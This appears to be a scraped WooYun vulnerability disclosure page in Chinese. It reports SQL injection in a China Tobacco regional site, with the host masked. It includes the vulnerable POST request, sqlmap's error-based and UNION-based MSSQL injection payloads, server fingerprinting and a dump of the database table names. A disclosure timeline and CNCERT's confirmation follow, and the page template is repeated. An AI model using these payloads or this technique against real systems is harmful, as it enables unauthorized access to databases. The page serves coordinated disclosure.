中国烟草某分站存在SQL注入漏洞可UNION | wooyun-2015-0159623| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0159623

漏洞标题：中国烟草某分站存在SQL注入漏洞可UNION

漏洞作者：路人甲

提交时间：2015-12-09 16:46

修复时间：2016-01-23 15:16

公开时间：2016-01-23 15:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-12-09：细节已通知厂商并且等待厂商处理中
2015-12-11：厂商已经确认，细节仅向厂商公开
2015-12-21：细节向核心白帽子及相关领域专家公开
2015-12-31：细节向普通白帽子公开
2016-01-10：细节向实习白帽子公开
2016-01-23：细节向公众公开

简要描述：

详细说明：

POST /Admin/Service/AjaxService.svc/SiteVisiteNum HTTP/1.1
Content-Type: application/json
Content-Length: 178
Cookie: CNZZDATA1256795375=39208491-1449538723-http%253A%252F%252F**.**.**.**%252F%7C1449538723; ASP.NET_SessionId=4bo35q10z0vjplbyuvjbk1dd
Host: **.**.**.**
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
{"contentcode":"","sitecode":"*"}

漏洞证明：

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: {"contentcode":"","sitecode":"') AND 4175=CONVERT(INT,(SELECT CHAR(113)+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4175=4175) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(98)+CHAR(120)+CHAR(113))) AND ('sVos'='sVos"}
    Type: UNION query
    Title: Generic UNION query (NULL) - 40 columns
    Payload: {"contentcode":"","sitecode":"') UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(113)+CHAR(122)+CHAR(107)+CHAR(113)+CHAR(89)+CHAR(79)+CHAR(102)+CHAR(87)+CHAR(83)+CHAR(101)+CHAR(122)+CHAR(114)+CHAR(97)+CHAR(109)+CHAR(113)+CHAR(122)+CHAR(98)+CHAR(120)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- "}
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
Database: WizCQYC_bak
[123 tables]
+-------------------------------+
| Base_Application              |
| Base_Application              |
| Base_DataPermission           |
| Base_DataSourceColumn         |
| Base_DataSourceColumn         |
| Base_DataSourceProp           |
| Base_DictionaryItemArea       |
| Base_DictionaryItemArea       |
| Base_DictionaryItemArea       |
| Base_DictionaryItemCountry    |
| Base_FlowNumber               |
| Base_FormColumnPropValue      |
| Base_FormColumnPropValue      |
| Base_FormColumnPropValue      |
| Base_FormCommonFieldEventCode |
| Base_FormCommonFieldEventCode |
| Base_FormCommonFieldEventCode |
| Base_FormCommonFieldPropValue |
| Base_FormCommonGroup          |
| Base_FormEventCode            |
| Base_FormEventCode            |
| Base_FormImportColumn         |
| Base_FormImportColumn         |
| Base_FormRelation             |
| Base_FormTree                 |
| Base_FormView                 |
| Base_Function                 |
| Base_Log                      |
| Base_Menu                     |
| Base_Message                  |
| Base_OrgArea                  |
| Base_OrgArea                  |
| Base_OrgPost                  |
| Base_OrgStaff                 |
| Base_OrgUser                  |
| Base_PermissionItem           |
| Base_PermissionItem           |
| Base_Post                     |
| Base_ResourcePermission       |
| Base_ResourcePermissionScope  |
| Base_Role                     |
| Base_SearchCondition          |
| Base_StaffPost                |
| Base_StaffPost                |
| Base_SystemFunction           |
| Base_SystemLog                |
| Base_SystemVariable           |
| Base_TableFieldControlType    |
| Base_TableFieldControlType    |
| Base_TableFieldControlType    |
| Base_TableFieldDataType       |
| Base_TableFieldEventCode      |
| Base_TableFieldEventCode      |
| Base_TableFieldProp           |
| Base_TableFieldPropValue      |
| Base_TableRecordStatus        |
| Base_TableRelationColumn      |
| Base_TableRelationColumn      |
| Base_TableTrigger             |
| Base_TableWorkflow            |
| Base_Task                     |
| Base_TempOperator             |
| Base_TempUserCondition        |
| Base_User                     |
| Base_UserRole                 |
| Base_WorkflowAction           |
| Base_WorkflowAction           |
| Base_WorkflowCondition        |
| Base_WorkflowOperator         |
| Base_WorkflowProc             |
| Base_WorkflowShare            |
| Base_WorkflowSignMate         |
| Base_WorkflowStepForm         |
| Base_WorkflowStepForm         |
| Base_WorkflowTask             |
| Base_WorkflowUserCondition    |
| Cms_Channel                   |
| Cms_ContentAttachment         |
| Cms_ContentCategory           |
| Cms_ContentLog                |
| Cms_ContentModel              |
| Cms_ContentPushLog            |
| Cms_ContentPushLog            |
| Cms_Content_Activity          |
| Cms_Content_Activity          |
| Cms_Content_Brand             |
| Cms_Content_Contact           |
| Cms_Content_Info              |
| Cms_Content_Interview         |
| Cms_Content_Lecture           |
| Cms_Content_Media             |
| Cms_Content_Message           |
| Cms_Content_News              |
| Cms_Content_Notice            |
| Cms_Content_People            |
| Cms_Content_Picture           |
| Cms_Content_Profile           |
| Cms_Content_Report            |
| Cms_Content_Special           |
| Cms_Content_Tender            |
| Cms_Content_Writing           |
| Cms_ModuleProp                |
| Cms_ModuleProp                |
| Cms_ModulePropValue           |
| Cms_ModuleRecommend           |
| Cms_ModuleTemplate            |
| Cms_ModuleType                |
| Cms_PageModule                |
| Cms_PageModule                |
| Cms_PageTemplateModule        |
| Cms_PageTemplateModule        |
| Cms_Site                      |
| Cms_TagCategory               |
| Cms_TagCategory               |
| Cms_TagProp                   |
| Cms_TagPropValue              |
| Cms_TemplateChannel           |
| Cms_Theme                     |
| JYTS_APP                      |
| JYTS_APPTYPE                  |
| JYTS_APPUSER                  |
| View_PageRender               |
| YC_Customer                   |
+-------------------------------+

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：10

确认时间：2015-12-11 17:23

厂商回复：

CNVD确认并复现所述情况,已经转由CNCERT下发给重庆分中心,由其后续协调网站管理单位处置.

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0159623

漏洞标题：中国烟草某分站存在SQL注入漏洞可UNION

相关厂商：cncert国家互联网应急中心

漏洞作者：路人甲

提交时间：2015-12-09 16:46

修复时间：2016-01-23 15:16

公开时间：2016-01-23 15:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0159623

漏洞标题：中国烟草某分站存在SQL注入漏洞可UNION

相关厂商：cncert国家互联网应急中心

漏洞作者： 路人甲

提交时间：2015-12-09 16:46

修复时间：2016-01-23 15:16

公开时间：2016-01-23 15:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0159623"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评价

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云